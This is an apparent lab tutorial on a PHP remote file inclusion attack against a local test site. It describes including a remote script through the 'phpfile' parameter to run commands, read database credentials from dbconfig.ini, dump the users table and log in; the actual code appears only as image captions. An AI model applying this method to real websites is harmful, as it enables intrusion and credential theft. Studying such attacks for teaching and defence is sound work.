In this guide, we will perform a simple PHP remote file inclusion.
The goal of this exploit is to be able to successfully login on the website by using credentials stored in the database.
Gaining access to the login credentials will be achieved by dumping the database content through remote file inclusion (remote code execution).

The badly programmed website includes any files that are supplied as value to the phpfile parameter in the URL.

This exploit is made possible by bad programming practices and insecure server settings.

PHP is often used to load content dynamically by using parameters in the URL.
By providing a parameter to a link, the server will dyamically decide which content to load depending on the parameter value.
Instead of creating static pages for every possible value, the information can be loaded dynamically depending on the parameter value supplied with the link.

PHP Remote File Inclusion sample site

Vulnerable PHP code (no input filtering – direct include). Vulnerable parameter name: phpfile

Testing remote file inclusion vulnerability can be done by adding a remote URL as value to the parameter.
The remote file inclusion is successful if a mixture of the original website and
the website behind the URL given as value to the vulnerable parameter is visible:

Mixed site content, remote file successfully included (website is vulnerable)

PHP script to be included as value to the phpfile parameter in the URL from client side

Including the script as value to the parameter (client IP: 192.168.4.67 server URL: 192.168.4.66).
Note that the script has to be uploaded and reachable by the web server hosting the vulnerable website.
In this case it is hosted on another webserver in the local network.
Remote Inclusion of the cmd.txt script with ‘dir’ command (lists folder contents):

Remote Inclusion of the cmd.txt script with ‘dir’ command (lists folder contents)

PHP script to be included remotely (shows tables in the database, parses the dbconfig.ini stored on the vulnerable target webserver for SQL server login credentials):

PHP script code that runs the SHOW TABLES query

Remote Inclusion URL and output of the dbTables.txt script (lists existing tables of the database)

PHP script code that runs the SELECT * FROM users query

Remote Inclusion of the dbSelectAllRows.txt script (lists all rows of the ‘users’ table)

Successful login on the vulnerable website using the stolen credentials